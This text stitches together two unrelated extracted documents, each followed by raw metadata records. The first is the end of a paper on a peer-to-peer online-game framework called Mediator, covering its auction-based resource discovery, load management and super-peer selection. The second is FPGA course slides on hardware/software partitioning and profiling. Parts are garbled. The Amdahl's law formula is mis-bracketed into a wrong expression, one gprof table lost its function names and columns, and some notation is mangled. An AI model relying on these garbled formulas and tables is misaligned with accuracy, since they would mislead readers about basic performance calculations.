discovery, and represents both the available resources and the job requests using ClassAds [11]. Though, Condor and Mediator share being pull-based and opportunistic [11], a major difference is that the former is static and centralized, whereas the latter is dynamic, decentralized and features multiple match-makers working in parallel. Figure 1 shows the structure of a Mediator Resource Ad and Job Ad. 1) Descriptions of the Resource Ad - The Owner field contains a resource provider’s Id as a 128bit code. The PRI and Rep fields respectively indicate the resource provider’s current contribution points and reputation score. The CPU, RAM, and BW fields reflect a peer’s available processing power1, memory (KB) and network bandwidth (Kbps). A resource provider is able to specify a minimum job weight that it accepts in the Mini field, because on the one hand a powerful provider may not want to be bothered by tiny jobs, and on the other hand, less competent providers would be starved of contribution opportunities if all jobs in their power were seized by stronger peers. The LV field is a serialized HashMap with peer Ids as keys, and latency values as contents (more details are discussed in section 3.3.2). The Rank and Requirements fields are required by the ClassAds match-making mechanism. 
By the evaluation of those two fields, it is determined whether a given resource provider is able to host a specific job or not, and to what extent both parties are a good match for each other.

Figure 1: Structures of Resource Ad and Job Ad

\(^1\)A benchmark-based way of evaluating the performance of a CPU product is suggested for simplicity and compatibility.

The last two fields, **Latency** and **Preference**, are completed by the RM that carried out the match-making. A RM finishes the Resource Ad from the selected resource provider, and passes it to the IMM as a bid for the corresponding job (more details are discussed in section 3.3.2).

2) **Descriptions of the Job Ad** - The **Owner** field reflects a peer Id, for whom RMs should minimize latency while selecting resource providers. The owner of a specific job is determined by the IMM that issued the Job Ad, according to a game event prediction algorithm which is tightly related to in-game logistics and beyond the scope of this paper. The **TTL**, **Amount**, and **ObjectType** fields respectively represent the lifetime, the cardinality, and the type of a game object. These three fields will be used by a selected resource provider to initialize the game objects. The IMM can specify a **Mini** field in a Job Ad to restrict the minimum reputation score for a required resource provider, according to the significance of the game object to be hosted. The **Deadline** and **TimeStamp** fields are utilized by the deadline-driven auction protocol. Finally, the **CPU**, **RAM** and **BW** fields describe the weight of a job.

### 3.3.2 Deadline-driven Auction (DA) Protocol

Figure 2 represents the overall flow of control of the framework, where sub-regions are labelled by circled numbers to establish a connection between the diagram and the corresponding text that explains it. As discussed in section 3.1, a BM and an IMM work in a similar way to a Home Node and a Master Node in MOPAR. At the bootstrapping stage, a peer routes an enquiry message to the target Zone Id through the structured P2P overlay, and this message is received and handled by the BM for that zone. If a ZM already exists in the zone, the BM replies to the enquiry with the current ZM's Id. Otherwise, the BM promotes the peer to be a provisional ZM, with a more capable ZM selected later on.

Once a peer has successfully joined a game zone, it updates the IMM when its moving speed or direction changes. In this way, the IMM obtains a global view of the zone-level game world, and is able to predict every peer's position in the near future. Peers whose Areas of Interest (AOI) are going to overlap will be notified by the IMM to establish direct P2P connections with each other, getting prepared for potential real-time interactions. In MOPAR, a Master Node is only required to predict player-vs.-player interactions. However, Mediator also requires an IMM to predict player-vs.-object events, e.g. a player avatar approaching a hidden spawn point of monsters will trigger a game event that releases three dragons in the next five seconds. In the abstract, given a frame interval \(T_{f}\), the IMM will predict the game events that satisfy \(E_t \in [T_f, 2T_f]\), where \(E_t\) is the estimated period of time before event \(E\) actually takes place, as well as a deadline before which the IMM must locate a capable resource provider to host the game objects involved in event \(E\), through cooperation with multiple RMs.
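As a rough illustration of the Ad structures of Figure 1 and of what "most suitable" could mean when an RM matches a job against its resource queue, here is a small Python sketch. All field types, the scoring formula and the helper names are assumptions made for this sketch; the framework itself expresses matching through the ClassAds Rank and Requirements expressions.

```python
# Illustrative sketch of Resource Ad / Job Ad fields and a naive
# preference computation. The scoring weights are assumptions only.
from dataclasses import dataclass, field
from typing import Dict

@dataclass
class ResourceAd:
    owner: str                 # peer Id of the resource provider
    pri: int                   # contribution points
    rep: float                 # reputation score
    cpu: float                 # benchmark-based CPU score
    ram_kb: int
    bw_kbps: int
    mini: float                # minimum job weight the provider accepts
    lv: Dict[str, float] = field(default_factory=dict)   # peer Id -> latency (ms)

@dataclass
class JobAd:
    owner: str                 # peer for whom latency should be minimised
    ttl: float
    amount: int
    object_type: str
    mini_rep: float            # minimum reputation required
    deadline: float
    cpu: float                 # job weight
    ram_kb: int
    bw_kbps: int

def requirements_met(res: ResourceAd, job: JobAd) -> bool:
    return (res.rep >= job.mini_rep
            and res.cpu >= job.cpu
            and res.ram_kb >= job.ram_kb
            and res.bw_kbps >= job.bw_kbps
            and job.cpu >= res.mini)

def preference(res: ResourceAd, job: JobAd) -> float:
    """Higher is better: mainly low latency to the job owner, then reputation."""
    latency = res.lv.get(job.owner, float("inf"))
    return -latency + 0.1 * res.rep + 0.01 * res.pri

def best_bid(candidates, job):
    """An RM's local pick: the admissible Resource Ad with the highest Preference."""
    matches = [r for r in candidates if requirements_met(r, job)]
    return max(matches, key=lambda r: preference(r, job), default=None)
```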
The process for locating a resource provider is directed by the DA protocol:

I. After the bootstrapping stage, a peer enrols at the ZM to become a zone member. The ZM responds with an empty Latency Vector (LV) and the communication endpoint of a selected RM. The empty LV contains a list of all existing zone members, but with all latency values set to infinity. The peer then starts to ping every other zone member to complete the LV. More up-to-date empty LVs will be issued by the ZM via a zone-level multicast for zone structure maintenance purposes.

II. Once the peer has finished pinging a majority of the zone members, it may create a Resource Ad according to its local load-management policy and upload it to the RM assigned by the ZM. Because what computing resources are available is transient information, the peer should update the RM when its resource availability changes.

III. At the RM end, large numbers of Resource Ads may be received from the peers that are currently attached to it. These Resource Ads are queued and wait to be accepted. Every time a RM receives a Resource Ad, it inspects the queue. If an existing Resource Ad from the same peer is identified, the previous Ad is replaced by the new one. The RM also monitors the TTL of each entry in the queue, and removes stale Resource Ads.

IV. At the IMM end, game events are predicted, and Job Ads are created and delivered to multiple RM instances within the game zone. When an RM receives a Job Ad, it estimates how much time is left for match-making by subtracting the round-trip time (RTT) from the deadline indicated by the Job Ad, and then finds the most suitable resource provider from the local resource queue in a best-effort manner. Because there will be real-time interaction between the selected resource provider and the resource consumer, the word "suitable" here mainly refers to minimum latency, accompanied by other considerations such as a resource provider's reputation and contribution. When the deadline for match-making is reached, or the RM has finished examining all existing Resource Ads in the queue, the resource provider with the highest **Preference** value is selected as the most suitable one.

V. Next, the RM completes the selected Resource Ad and uploads it to the IMM as a bid for the job. Because the IMM only aims at employing the best resource provider, this becomes an auction among the multiple RMs, and any less preferred bid is rejected immediately by the IMM. In other words, the worst case for a RM is to wait for \(E_t - \frac{RTT}{2}\) time before confirming that its bid has won the auction.

VI. Finally, the winning RM passes the Job Ad to the selected resource provider, and the latter will initialize the game objects accordingly. If the game objects are stateless AI-controlled monsters, the resource provider can load the AI programs from a local copy of the game logic. Otherwise, if the game objects are stateful, the resource provider may acquire the related information through a P2P MMOG persistence scheme such as was discussed in section 2.3.

### 3.4 Load-management

#### 3.4.1 Peer-level Load-management

Because Mediator adopts a pull-based scheduling strategy, every individual peer monitors its own computing resources and decides at what time to ask for new jobs, and how many jobs to ask for.
The set of configuration parameters related to peer level scheduling is called the Contribution Enthusiasm, which controls the following aspects of a peer’s local scheduling behavior: 1) **The amount of dedicated resources** - A player is able to specify what percentage of its computing resources it would like to contribute to a P2P MMOG. To encourage voluntary contribution, the framework allows a player to... join the application as a dedicated contributor, when the player is not playing the game but the player’s computing resources are being utilized. 2) Pulling frequency and job selection - A peer can determine how often it uploads Resource Ads to a RM, and specify which job types it prefers, accepts, and refuses. The framework encourages stronger peers to seek a large bundle of jobs or to work as a super-peer, and leave the lesser jobs to weaker or slower to access peers. 3) Super-peer role solicitation - A peer can specify whether it is interested in super-peer jobs. If it is interested, the peer can evaluate its hardware configuration against the Reference Resource Ad (RRA) that is periodically issued by the ZM, to find out whether it is presently qualified for a super-peer role. According to the self-qualification result, the peer decides whether to register at the ZM as a super-peer backup. Generally speaking, a super-peer job would be better rewarded than a common resource contributor. However, a super-peer is required to commit to providing the service for a long enough gaming session, and if the peer violates this commitment, its reputation will be diminished. 3.4.2 Zone-level Load-management The zone-level load-management mechanism is designed to balance super-peer workloads approximately. Because a ZM is responsible for promoting various super-peers in the framework, zone-level load-management is mainly embodied by the ZM decision-making algorithms to promote adequate super-peers in a game zone, and prevent any super-peer from becoming overloaded. On the one hand, a ZM should maintain the super-peer to common peer ratio in a game zone to approximately a constant. Every time a new peer joins its zone, the ZM evaluates whether more super-peers are needed. If the answer is positive, the ZM would promote a given number of super-peers from a super-peer backup queue @. Moreover, it is also necessary for a ZM to monitor the length of the backup queue, in order to protect a game zone from super-peer paucity. The ZM will also regulate the length of the backup queue by tuning the super-peer qualification criteria specified in each RRA that it issues. On the other hand, each working super-peer should periodically report its workload to the ZM, and the ZM will either shift part of a heavy-loaded super-peer’s work to other super-peers, or just assign the lightly-loaded super-peers to new participants from then on @. Workload information can be delivered to a ZM when a super-peer periodically refreshes the ZM with knowledge of its existence. If a super-peer fails to report for a sufficient period of time, the ZM will assume that the super-peer has left the game zone silently, and replace the super-peer with a capable backup. 3.5 Super-peer Selection Super-peer selection is a common problem that emerges across a variety of P2P applications with many different selection protocols presented in the literature [17, 9]. In the Mediator framework, except for the BM that is a light-weight super-peer selected in a structured way, other Mediator roles are selected using a policy-based approach. 
Currently, the framework only suggests some fundamental policies; more application-specific ones can be flexibly introduced by different P2P MMOG designs.

**Policy 1** Only qualified, high-performance peers can be selected as Mediators, unless the zone is bootstrapping, when any peer can be selected as a provisional Zone Mediator, or during a resource paucity period, when the super-peer qualification criteria are temporarily lowered.

**Policy 2** A ZM should avoid assigning multiple Mediator roles to a single peer if other qualified candidates are available, unless the peer works as the BM for multiple game zones, or happens to be both a Mediator for its native zone and a BM for a foreign zone.

**Policy 3** A relatively stable ratio between common peers and super-peers should be maintained, in order to prevent, on the one hand, any super-peer from being overloaded and, on the other hand, too many super-peers from being promoted and sitting idle.

4. IMPLEMENTATION

A proof-of-concept prototype of the Mediator framework is being built using FreePastry 2.0 and the ClassAds Java library 2.2. The prototype employs the Direct Simulator integrated in the FreePastry package, and has successfully simulated 1000 peers on an AMD 64 3000+ workstation with 2 GB of memory. The simulator takes in a table of floating-point latency values that is generated by a standard network topology generator such as GT-ITM. According to the topology file, both the direct latency between two peers and the accumulated latency for routing a message through the P2P overlay are simulated. In the prototype, each peer is assigned a certain amount of virtual computing resources, and the local scheduling behaviours are simulated by a resource monitor stub. Preliminary experimental results indicate that the various Mediator roles are allocated as peers join the application, that zone structures are maintained correctly when peers move from one zone to another, and that the virtual computing resources owned by each peer are dynamically consumed by satisfying job requests.

5. CONCLUSION AND FUTURE WORK

This paper presents Mediator, a novel P2P MMOG design framework that addresses four sub-issues: the reward scheme, distributed resource discovery, load-management, and super-peer selection. These issues are crucial for distributing the functionalities of a traditional game server, but have received little attention in the literature. In Mediator, game objects are hosted using player machines' computing resources, and hence the MMOG scales better in both communication and computation. One avenue of future work is to complete experiments to validate and measure:

1) **Effectiveness** - Given a deadline ($T_F$) that is sufficiently long, a resource provider with an optimal **Preference** value should be located.

2) **Efficiency** - There should be a direct proportionality between $T_F$ and the **Preference** value, so that an efficient $T_F$ can be predicted that affords an acceptable **Preference**.

3) **Scalability** - All experiments will be repeated several times against different peer populations, to test whether the framework scales.

4) **Robustness** - Exceptional events, e.g. Mediators ceasing to function, will be simulated to test whether the framework is robust enough to recover from potential failures.
The current prototype does not support load-management for Zone and Interest Management Mediators, and future work will investigate algorithms for dynamic zoning, so that overcrowded game zones can be divided into disjoint or even parallel sub-zones, each with its own ZM and IMM. Similarly, sparsely populated game zones can be combined into a single zone that is controlled by a joint ZM and IMM.

6. REFERENCES
{"Source-Url": "https://pureapps2.hw.ac.uk/portal/files/416818/netgames.pdf", "len_cl100k_base": 6605, "olmocr-version": "0.1.50", "pdf-total-pages": 7, "total-fallback-pages": 0, "total-input-tokens": 22603, "total-output-tokens": 8271, "length": "2e12", "weborganizer": {"__label__adult": 0.0012531280517578125, "__label__art_design": 0.0009107589721679688, "__label__crime_law": 0.0015993118286132812, "__label__education_jobs": 0.0031986236572265625, "__label__entertainment": 0.0009975433349609375, "__label__fashion_beauty": 0.0006990432739257812, "__label__finance_business": 0.0011196136474609375, "__label__food_dining": 0.0016222000122070312, "__label__games": 0.11822509765625, "__label__hardware": 0.0032978057861328125, "__label__health": 0.002170562744140625, "__label__history": 0.0015497207641601562, "__label__home_hobbies": 0.0002582073211669922, "__label__industrial": 0.0011653900146484375, "__label__literature": 0.0010385513305664062, "__label__politics": 0.0008640289306640625, "__label__religion": 0.0013837814331054688, "__label__science_tech": 0.25439453125, "__label__social_life": 0.00040030479431152344, "__label__software": 0.031768798828125, "__label__software_dev": 0.568359375, "__label__sports_fitness": 0.0014934539794921875, "__label__transportation": 0.0011930465698242188, "__label__travel": 0.00091552734375}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 35322, 0.04087]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 35322, 0.36439]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 35322, 0.9177]], "google_gemma-3-12b-it_contains_pii": [[0, 1076, false], [1076, 6124, null], [6124, 12558, null], [12558, 18061, null], [18061, 25140, null], [25140, 29227, null], [29227, 35322, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1076, true], [1076, 6124, null], [6124, 12558, null], [12558, 18061, null], [18061, 25140, null], [25140, 29227, null], [29227, 35322, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 35322, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 35322, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 35322, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 35322, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 35322, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 35322, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 35322, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 35322, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 35322, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 35322, null]], "pdf_page_numbers": [[0, 1076, 1], [1076, 6124, 2], [6124, 12558, 3], [12558, 18061, 4], [18061, 25140, 5], [25140, 29227, 6], [29227, 35322, 7]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 35322, 0.0]]}
olmocr_science_pdfs
2024-12-01
2024-12-01
c576cdd405d571666e55afa1004aea526637f458
Embedded Systems Design with Platform FPGAs
Partitioning
Ron Sass and Andrew G. Schmidt
http://www.rcs.uncc.edu/~rsass
University of North Carolina at Charlotte
Spring 2011

Chapter 4: Partitioning

Chapter 4 Learning Objectives

Topics
- partitioning hardware and software tasks
- formulation of an analytical solution
- pragmatic issues

Problem Statement

Given a Software Reference Design, how do we decompose it into hardware and software components?

Key Elements:
- the software reference design is often a sequential application
- the goal in an embedded system is to address one (or more) of the multi-faceted performance metrics (from Chapter 1)
- FPGA resources are fungible, but there is a fixed total

Our Approach
- formulate the problem analytically
- explore mathematical optimization of the model
- describe practical issues not accounted for in the model

Assuming the software reference model is a sequential program, then **partitioning** is
- the act of grouping sets of instructions,
- mapping each group to either hardware or software,
- implementing the groups destined for hardware in HDL,
- creating the interfaces to transfer control back and forth

Partitioning Feature

A hardware group or cluster of instructions is called a **feature**; once implemented in an HDL and added to a base system, a feature specializes the computer system architecture (hence the name: it becomes an architectural feature)
- also known as a "computational kernel" or just "kernel"
- the idea is to solve the general problem by selecting suitable features from the program to be implemented in hardware
- but the big question is "what are the suitable features?"

Partitioning Profiling
- to answer the question we need data
- the simplest way to collect data is to profile the software reference design
- gprof is a good, general-purpose profiler
- sample-based profilers, such as gprof, work by
  - interrupting the application at fixed time intervals
  - building a histogram from the program counters
  - keeping track of total run-time
- afterwards, these data can be used to characterize where "most of the time is spent" in a program
- some profilers also keep track of the number of times a subroutine is invoked

For `gprof`, the program is compiled with the `-pg` option; after execution, there is a `gmon.out` binary file with the profile information. The `gprof` command reads `gmon.out` and gives us a "human readable" version of the profile information in table form. A handy Python script (Gprof2dot), combined with a graph layout application called GraphViz, does an excellent job of presenting the information graphically.

Simple Timing
- the `time` command can be used to get a general picture

```
% time ./simple
real 1m14.991s
user 0m21.959s
sys 0m0.523s
```

- the first number is the "wall clock" time, while the second and third represent the time spent computing in the program and the operating system, respectively
- the unaccounted-for time was spent waiting for I/O

## AES gprof Output

Each sample counts as 0.01 seconds.
<table> <thead> <tr> <th>% cumulative</th> <th>time</th> <th>self</th> <th>self</th> <th>total</th> <th>name</th> </tr> </thead> <tbody> <tr> <td></td> <td>seconds</td> <td>seconds</td> <td>calls</td> <td>ms/call</td> <td>ms/call</td> </tr> <tr> <td>93.87</td> <td>8.12</td> <td>8.12</td> <td>14145726</td> <td>0.00</td> <td>0.00</td> </tr> <tr> <td>5.55</td> <td>8.60</td> <td>0.48</td> <td>27629</td> <td>0.02</td> <td>0.31</td> </tr> <tr> <td>0.29</td> <td>8.62</td> <td>0.03</td> <td>1</td> <td>25.00</td> <td>25.00</td> </tr> <tr> <td>0.29</td> <td>8.65</td> <td>0.03</td> <td></td> <td></td> <td></td> </tr> <tr> <td>0.00</td> <td>8.65</td> <td>0.00</td> <td>55282</td> <td>0.00</td> <td>0.00</td> </tr> <tr> <td>0.00</td> <td>8.65</td> <td>0.00</td> <td>93</td> <td>0.00</td> <td>0.00</td> </tr> <tr> <td>0.00</td> <td>8.65</td> <td>0.00</td> <td>1</td> <td>0.00</td> <td>0.00</td> </tr> <tr> <td>0.00</td> <td>8.65</td> <td>0.00</td> <td>1</td> <td>0.00</td> <td>0.00</td> </tr> <tr> <td>0.00</td> <td>8.65</td> <td>0.00</td> <td>1</td> <td>0.00</td> <td>0.00</td> </tr> <tr> <td>0.00</td> <td>8.65</td> <td>0.00</td> <td>1</td> <td>0.00</td> <td>0.00</td> </tr> <tr> <td>0.00</td> <td>8.65</td> <td>0.00</td> <td>1</td> <td>0.00</td> <td>0.00</td> </tr> <tr> <td>0.00</td> <td>8.65</td> <td>0.00</td> <td>1</td> <td>0.00</td> <td>0.00</td> </tr> <tr> <td>0.00</td> <td>8.65</td> <td>0.00</td> <td>1</td> <td>0.00</td> <td>0.00</td> </tr> </tbody> </table> Each sample counts as 0.01 seconds. <table> <thead> <tr> <th>% cumulative time</th> <th>seconds</th> <th>self seconds</th> <th>calls</th> <th>ms/call</th> <th>ms/call</th> <th>name</th> </tr> </thead> <tbody> <tr> <td>16.97</td> <td>2.42</td> <td>2.42</td> <td>20</td> <td>121.02</td> <td>121.02</td> <td>amp1</td> </tr> <tr> <td>16.83</td> <td>4.82</td> <td>2.40</td> <td>20</td> <td>120.02</td> <td>120.02</td> <td>amp2</td> </tr> <tr> <td>16.41</td> <td>7.16</td> <td>2.34</td> <td>20</td> <td>117.02</td> <td>117.02</td> <td>far2</td> </tr> <tr> <td>11.01</td> <td>8.73</td> <td>1.57</td> <td>20</td> <td>78.51</td> <td>78.51</td> <td>amp3</td> </tr> <tr> <td>10.94</td> <td>10.29</td> <td>1.56</td> <td>20</td> <td>78.01</td> <td>78.01</td> <td>far3</td> </tr> <tr> <td>10.66</td> <td>11.81</td> <td>1.52</td> <td>20</td> <td>76.01</td> <td>76.01</td> <td>far1</td> </tr> <tr> <td>4.70</td> <td>12.48</td> <td>0.67</td> <td>2920</td> <td>0.23</td> <td>0.23</td> <td>h_inner13</td> </tr> <tr> <td>2.88</td> <td>12.89</td> <td>0.41</td> <td>1920</td> <td>0.21</td> <td>0.21</td> <td>e_inner13</td> </tr> <tr> <td>2.52</td> <td>13.25</td> <td>0.36</td> <td>1</td> <td>360.05</td> <td>360.05</td> <td>grid</td> </tr> <tr> <td>1.82</td> <td>13.51</td> <td>0.26</td> <td>1</td> <td>260.04</td> <td>260.04</td> <td>tstep</td> </tr> <tr> <td>1.19</td> <td>13.68</td> <td>0.17</td> <td>778</td> <td>0.22</td> <td>0.22</td> <td>asuby</td> </tr> <tr> <td>1.05</td> <td>13.83</td> <td>0.15</td> <td>2</td> <td>75.01</td> <td>75.01</td> <td>initial</td> </tr> <tr> <td>0.98</td> <td>13.97</td> <td>0.14</td> <td>2</td> <td>70.01</td> <td>250.04</td> <td>SYMMLQ</td> </tr> <tr> <td>0.56</td> <td>14.05</td> <td>0.08</td> <td>2334</td> <td>0.03</td> <td>0.03</td> <td>DAXPY</td> </tr> <tr> <td>0.42</td> <td>14.11</td> <td>0.06</td> <td>1560</td> <td>0.04</td> <td>0.04</td> <td>DDOT</td> </tr> <tr> <td>0.42</td> <td>14.17</td> <td>0.06</td> <td>1</td> <td>60.01</td> <td>60.01</td> <td>free_space</td> </tr> <tr> <td>0.35</td> <td>14.22</td> <td>0.05</td> <td>1556</td> <td>0.03</td> <td>0.03</td> 
<td>DCOPY</td> </tr> <tr> <td>0.14</td> <td>14.24</td> <td>0.02</td> <td>10</td> <td>2.00</td> <td>2.00</td> <td>Je1</td> </tr> <tr> <td>0.07</td> <td>14.25</td> <td>0.01</td> <td>10</td> <td>1.00</td> <td>1.00</td> <td>Jm1</td> </tr> <tr> <td>0.07</td> <td>14.26</td> <td>0.01</td> <td>1</td> <td>10.00</td> <td>10.00</td> <td>rectangle</td> </tr> <tr> <td>0.00</td> <td>14.26</td> <td>0.00</td> <td>40</td> <td>0.00</td> <td>0.00</td> <td>wave</td> </tr> <tr> <td>0.00</td> <td>14.26</td> <td>0.00</td> <td>1</td> <td>0.00</td> <td>0.00</td> <td>tst_params</td> </tr> </tbody> </table> Partitioning AES and FDTD Analysis - the AES application, `aes_encrypt` took 93.87% of the time (very good) but it was invoked 14,145,726 times! - FDTD is a computational science application - six functions take most, but not all, of the execution time - however, each function was only invoked 20 times Amdahl’s Law - well known in computer architecture \[ \text{Speedup}_{\text{overall}} = \frac{1}{(1 - \text{Fraction}_{\text{enhanced}})} + \frac{\text{Fraction}_{\text{enhanced}}}{\text{Speedup}_{\text{enhanced}}} \] - So if only one feature implemented in FDTD: 20% speedup (max) - But if top six features implemented in FDTD: 5.8× speedup (max) Partitioning FDTD Gprof2dot/GraphViz main 100.00% (0.00%) amp1 16.97% (16.97%) 20× amp2 16.83% (16.83%) 20× far2 16.41% (16.41%) 20× amp3 11.01% (11.01%) 20× far3 10.94% (10.94%) 20× far1 10.66% (10.66%) 20× probes 7.57% (0.00%) 20× tem_y 3.51% (0.00%) 2× grid 2.52% (1.82%) 1× tstep 1.82% (1.82%) 1× initial 1.05% (1.05%) 2× h_inner13 4.70% (4.70%) 2920× e_inner13 2.88% (2.88%) 1920× solve_y 3.51% (0.00%) 2× SYMLQ 3.51% (0.98%) 2× asuby 1.19% (1.19%) 778× DAXPY 0.56% (0.56%) 2334× Another Graphical Example Partitioning Interpretation - armed with this information, the system designer can make some decisions - easy case: JPEG2000 - 11% reading source image - 89% encoding - in other cases though... - no computation dominates - limited FPGA resources - resources/feature varies - performance gain/feature varies some analysis gets us half-way there; then address the pragmatic concerns Basic Definitions - an application consists of collection of subroutines that are related via a (static) call graph - that is, - $C_i = (B_i, F_i)$ is a Control Flow Graph (CFG) that represents a subroutine - and the call graph is a graph of CFGs: $$A = (C, L)$$ where $L \subseteq C \times C$ - on the surface, it might seem easier to use a less complicated model — say, two groups (the hardware and software) — but this does not allow us to reason about discontinuous regions of hardware features Formally, we can define a partition of the *basic blocks* as follows. 
- let $\mathcal{S} = \{S_0, S_1, \ldots\}$ be a collection of subsets of some universal set $U$ such that three conditions are met:
  - $\bigcup_{S \in \mathcal{S}} S = U$
  - $\forall S, S' \in \mathcal{S} \bullet S \neq S' \implies S \cap S' = \emptyset$
  - $\forall S \in \mathcal{S} \bullet S \neq \emptyset$
- in English, this says that every element in the universe appears in some subset, every element appears in only one subset, and there are no empty subsets

Partition Example

The universe $U = \{a, e, i, o, u, y\}$ could be partitioned into two subsets,
$$\mathcal{X}_a = \{\{a, e, i, o, u\}, \{y\}\}$$
which is visually represented by:

![Diagram showing a partitioning of the universe U]

Partitioning An Application

The same concept can be applied to an application:
- the universe is the collection of basic blocks
- a *natural* partition groups the basic blocks by the subroutine they belong to
$$
S = \bigl\{ \{b_0, b_1, \ldots, b_{i-1}\}, \{b_i, b_{i+1}, \ldots\}, \ldots, \{b_j, b_{j+1}, \ldots\} \bigr\}
$$
- our job here is to reorganize contiguous basic blocks such that some are destined for hardware
$$
\mathcal{X}' = \bigl\{ \{b_j, b_{j+1}, \ldots\}, \{b_k, b_{k+1}, \ldots\}, \ldots, \{b_0, b_1, \ldots, b_{i-1}\}, \{b_i, b_{i+1}, \ldots\} \bigr\}
$$
**software** **hardware**

Now we can define the expected performance gain:
- first for the individual features
- then collectively for the system

This will give us a tool to weigh decisions and compare system choices.

Defining Performance
- as we know, performance is not a scalar
- rate-of-execution is a common measure
- but power, cost, and others are important to embedded systems

Here, we will use rate-of-execution to demonstrate the concepts.

There are four mechanisms for transferring control between hardware and software.
<table> <thead> <tr> <th>Transfer from:</th> <th>Transfer to:</th> </tr> </thead> <tbody> <tr> <td>Software</td> <td>Hardware</td> </tr> <tr> <td>Subroutine call</td> <td>Go/done</td> </tr> <tr> <td>Interrupt</td> <td>Instantiation</td> </tr> </tbody> </table> **Partitioning** **Transfer of Control** Partitioning Cycles in Call Graph ![Call Graph Diagram] - main - gensurf - sar - feature - print - list - daxpy Embedded Systems Design with Platform FPGAs extern int m, b; int trans_and_inc ( int &x ) { int y; y = m * x + b; x++; return y; } int trans(int x, int m, int b) { int y; y = m * x + b; return y; } Trapped State — Many places in the memory hierarchy where data may reside — also known as serialization, it creates a temporary record to transfer data between hardware and software Partitioning Performance - Transfer speeds can be highly data dependent - DMA is usually best for large transfers - However, many features only need small transfers **Performance Quantified** - Application/OS/Hardware interfaces - Mmap avoids system call but does not allow the device to be shared ![Transaction speed by method](image-url) Chapter-In-Review - described the general problem - looked at specific profiling data - formulated an analytical solution - addressed pragmatic short comings of model Partitioning Chapter 4 Terms partitioning the process of decomposing an application into multiple implementations (such as hardware and software implementations) feature a portion of software that is a candidate for hardware implementation (by candidate we mean the hardware implementation is much faster than software implementation) interface is the set of rules that govern this interaction between two entities (for example, the interaction between a processor and an I/O device) Partitioning Chapter 4 Terms **marshaling** hardware and software implementations have different views of the state of the machine; marshaling is the process of explicitly organizing the transfer of state between the two **instrumentation** when a compiler or synthesis tool adds extra functionality to a task to help determine its characteristics within an application; for example, tasks are often instrumented to measure the amount of time spent completing the task or how much time is spent idle
{"Source-Url": "http://homepages.wmich.edu/~bazuinb/ECE5570/ch04_presenter.pdf", "len_cl100k_base": 4669, "olmocr-version": "0.1.50", "pdf-total-pages": 33, "total-fallback-pages": 0, "total-input-tokens": 51012, "total-output-tokens": 5583, "length": "2e12", "weborganizer": {"__label__adult": 0.0005946159362792969, "__label__art_design": 0.0007443428039550781, "__label__crime_law": 0.0005207061767578125, "__label__education_jobs": 0.0013284683227539062, "__label__entertainment": 9.757280349731444e-05, "__label__fashion_beauty": 0.0002884864807128906, "__label__finance_business": 0.0003578662872314453, "__label__food_dining": 0.0005574226379394531, "__label__games": 0.0010690689086914062, "__label__hardware": 0.0274658203125, "__label__health": 0.0008244514465332031, "__label__history": 0.0004189014434814453, "__label__home_hobbies": 0.00034046173095703125, "__label__industrial": 0.0017004013061523438, "__label__literature": 0.0002677440643310547, "__label__politics": 0.00037288665771484375, "__label__religion": 0.0007724761962890625, "__label__science_tech": 0.1602783203125, "__label__social_life": 9.79304313659668e-05, "__label__software": 0.0074005126953125, "__label__software_dev": 0.7919921875, "__label__sports_fitness": 0.0006036758422851562, "__label__transportation": 0.001621246337890625, "__label__travel": 0.0002872943878173828}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 12549, 0.14255]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 12549, 0.32613]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 12549, 0.82704]], "google_gemma-3-12b-it_contains_pii": [[0, 175, false], [175, 200, null], [200, 343, null], [343, 701, null], [701, 852, null], [852, 1155, null], [1155, 1646, null], [1646, 2196, null], [2196, 2607, null], [2607, 2974, null], [2974, 4065, null], [4065, 6286, null], [6286, 6596, null], [6596, 6952, null], [6952, 7452, null], [7452, 7492, null], [7492, 7874, null], [7874, 8386, null], [8386, 8902, null], [8902, 9139, null], [9139, 9793, null], [9793, 9983, null], [9983, 10213, null], [10213, 10507, null], [10507, 10667, null], [10667, 10861, null], [10861, 10936, null], [10936, 11044, null], [11044, 11211, null], [11211, 11388, null], [11388, 11556, null], [11556, 12047, null], [12047, 12549, null]], "google_gemma-3-12b-it_is_public_document": [[0, 175, true], [175, 200, null], [200, 343, null], [343, 701, null], [701, 852, null], [852, 1155, null], [1155, 1646, null], [1646, 2196, null], [2196, 2607, null], [2607, 2974, null], [2974, 4065, null], [4065, 6286, null], [6286, 6596, null], [6596, 6952, null], [6952, 7452, null], [7452, 7492, null], [7492, 7874, null], [7874, 8386, null], [8386, 8902, null], [8902, 9139, null], [9139, 9793, null], [9793, 9983, null], [9983, 10213, null], [10213, 10507, null], [10507, 10667, null], [10667, 10861, null], [10861, 10936, null], [10936, 11044, null], [11044, 11211, null], [11211, 11388, null], [11388, 11556, null], [11556, 12047, null], [12047, 12549, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 12549, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 12549, null]], 